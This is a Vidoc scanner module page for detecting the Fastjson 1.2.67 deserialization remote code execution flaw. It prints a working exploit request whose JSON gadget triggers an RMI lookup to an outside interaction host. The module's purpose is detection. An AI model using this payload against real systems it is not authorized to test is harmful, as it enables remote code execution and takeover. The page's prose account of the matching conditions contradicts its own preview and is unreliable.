Ethical Hacking Automation

Automate Recon and scanning process with Vidoc. All security teams in one place

Fastjson 1.2.67 - Remote Code Execution

By kannthu

Critical
Vidoc logoVidoc Module
#fastjson#rce#deserialization#oast
Description

Fastjson 1.2.67 - Remote Code Execution

What is "Fastjson 1.2.67 - Remote Code Execution?"

The "Fastjson 1.2.67 - Remote Code Execution" module is designed to detect a vulnerability in Fastjson 1.2.67, a popular JSON library for Java. This vulnerability allows remote attackers to execute arbitrary code on the target system. The severity of this vulnerability is classified as critical, with a CVSS score of 10.

Author: zh

Impact

If successfully exploited, this vulnerability can lead to unauthorized remote code execution on the target system. Attackers can potentially gain full control over the affected system, compromising its confidentiality, integrity, and availability.

How does the module work?

The module sends a crafted HTTP POST request to the target system, exploiting the Fastjson vulnerability. The request payload includes a specially crafted JSON object that triggers the remote code execution vulnerability.

Example request:

POST / HTTP/1.1
Host: <Hostname>
Content-Type: application/json

{
   "@type":"com.ibatis.sqlmap.engine.transaction.jta.JtaTransactionConfig",
   "properties":{
      "@type":"java.util.Properties",
      "UserTransaction":"rmi://<InteractionURL>/Exploit"
   }
}

The module includes matching conditions to determine if the vulnerability is present:

- The request must not use the "dns" protocol for interaction. - The response status code must not be 200.

If both conditions are met, the module reports the vulnerability.

Reference: https://github.com/tdtc7/qps/tree/4042cf76a969ccded5b30f0669f67c9e58d1cfd2/Fastjson

Module preview

Concurrent Requests (1)
1. HTTP Request template
Raw request
Matching conditions
word: dnsand
NOT status: 200
Passive global matcher
No matching conditions.
On match action
Report vulnerability